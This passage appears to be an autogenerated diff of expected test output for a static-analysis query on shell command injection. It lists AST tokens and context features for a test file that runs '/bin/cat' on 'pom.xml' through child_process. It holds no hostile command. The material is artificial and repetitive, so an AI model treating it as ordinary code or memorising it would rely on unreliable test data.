cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:39:69:54 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:39:69:54 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:39:69:54 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:39:69:54 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:39:69:54 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:49:69:54 | 'utf8' | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:49:69:54 | 'utf8' | InputAccessPathFromCallee | 2.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:49:69:54 | 'utf8' | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:49:69:54 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:49:69:54 | 'utf8' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:49:69:54 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:49:69:54 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:49:69:54 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:69:57 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:69:57 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:69:57 | this | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:69:57 | this | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:69:57 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | 'arguments' object of anonymous function | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | 'arguments' object of anonymous function | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | exceptional return of anonymous function | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | exceptional return of anonymous function | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | functio ... out);\\n} | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | functio ... out);\\n} | InputArgumentIndex | 3 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | functio ... out);\\n} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | functio ... out);\\n} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | functio ... out);\\n} | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | functio ... out);\\n} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | return of anonymous function | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | return of anonymous function | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:58:72:1 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:67:69:71 | error | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:67:69:71 | error | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:67:69:71 | error | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:67:69:71 | error | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:67:69:71 | error | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:74:69:79 | stdout | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:74:69:79 | stdout | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:74:69:79 | stdout | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:74:69:79 | stdout | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:74:69:79 | stdout | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:74:69:79 | stdout | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:74:69:79 | stdout | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:74:69:79 | stdout | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:74:69:79 | stdout | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:74:69:79 | stdout | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:82:69:87 | stderr | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:82:69:87 | stderr | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:82:69:87 | stderr | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:82:69:87 | stderr | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:69:82:69:87 | stderr | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:9 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:9 | console | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:9 | console | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:9 | console | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:9 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:13 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:13 | console.log | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:13 | console.log | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:13 | console.log | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:13 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:21 | console.log(stdout) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:21 | console.log(stdout) | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:21 | console.log(stdout) | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:21 | console.log(stdout) | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:21 | console.log(stdout) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:21 | exceptional return of console.log(stdout) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:21 | exceptional return of console.log(stdout) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:21 | exceptional return of console.log(stdout) | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:21 | exceptional return of console.log(stdout) | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:3:71:21 | exceptional return of console.log(stdout) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:11:71:13 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:11:71:13 | log | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:11:71:13 | log | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:11:71:13 | log | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:11:71:13 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:15:71:20 | stdout | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:15:71:20 | stdout | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:15:71:20 | stdout | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:15:71:20 | stdout | contextSurroundingFunctionParameters | (error, stdout, stderr) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:15:71:20 | stdout | enclosingFunctionBody | error stdout stderr console log stdout | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:15:71:20 | stdout | enclosingFunctionName | execFile#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:15:71:20 | stdout | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:71:15:71:20 | stdout | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:1:74:12 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:1:74:12 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:1:74:12 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:1:74:60 | exceptional return of execFil ... utf8'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:1:74:60 | exceptional return of execFil ... utf8'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:1:74:60 | exceptional return of execFil ... utf8'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:1:74:60 | execFil ... utf8'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:1:74:60 | execFil ... utf8'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:1:74:60 | execFil ... utf8'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:14:74:23 | '/bin/cat' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:14:74:23 | '/bin/cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:14:74:23 | '/bin/cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:14:74:23 | '/bin/cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:14:74:23 | '/bin/cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:14:74:23 | '/bin/cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:26:74:38 | [ 'pom.xml' ] | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:26:74:38 | [ 'pom.xml' ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:26:74:38 | [ 'pom.xml' ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:26:74:38 | [ 'pom.xml' ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:26:74:38 | [ 'pom.xml' ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:26:74:38 | [ 'pom.xml' ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:28:74:36 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:28:74:36 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:28:74:36 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:28:74:36 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:28:74:36 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:28:74:36 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:42:74:59 | {encoding: 'utf8'} | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:42:74:59 | {encoding: 'utf8'} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:42:74:59 | {encoding: 'utf8'} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:42:74:59 | {encoding: 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:42:74:59 | {encoding: 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:42:74:59 | {encoding: 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:43:74:50 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:43:74:50 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:43:74:50 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:43:74:58 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:43:74:58 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:43:74:58 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:43:74:58 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:43:74:58 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:43:74:58 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:53:74:58 | 'utf8' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:53:74:58 | 'utf8' | InputAccessPathFromCallee | 2.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:53:74:58 | 'utf8' | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:53:74:58 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:53:74:58 | 'utf8' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:53:74:58 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:53:74:58 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:74:53:74:58 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:1:76:12 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:1:76:12 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:1:76:12 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:1:76:39 | exceptional return of execFil ... xml' ]) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:1:76:39 | exceptional return of execFil ... xml' ]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:1:76:39 | exceptional return of execFil ... xml' ]) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:1:76:39 | execFil ... xml' ]) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:1:76:39 | execFil ... xml' ]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:1:76:39 | execFil ... xml' ]) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:14:76:23 | '/bin/cat' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:14:76:23 | '/bin/cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:14:76:23 | '/bin/cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:14:76:23 | '/bin/cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:14:76:23 | '/bin/cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:14:76:23 | '/bin/cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:26:76:38 | [ 'pom.xml' ] | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:26:76:38 | [ 'pom.xml' ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:26:76:38 | [ 'pom.xml' ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:26:76:38 | [ 'pom.xml' ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:26:76:38 | [ 'pom.xml' ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:26:76:38 | [ 'pom.xml' ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:28:76:36 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:28:76:36 | 'pom.xml' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:28:76:36 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:28:76:36 | 'pom.xml' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:28:76:36 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:76:28:76:36 | 'pom.xml' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:5:78:8 | opts | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:5:78:8 | opts | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:5:78:8 | opts | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:5:78:29 | opts | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:5:78:29 | opts | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:5:78:29 | opts | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:5:78:29 | opts = ... 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:5:78:29 | opts = ... 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:5:78:29 | opts = ... 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:12:78:29 | {encoding: 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:12:78:29 | {encoding: 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:12:78:29 | {encoding: 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:13:78:20 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:13:78:20 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:13:78:20 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:78:13:78:28 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| 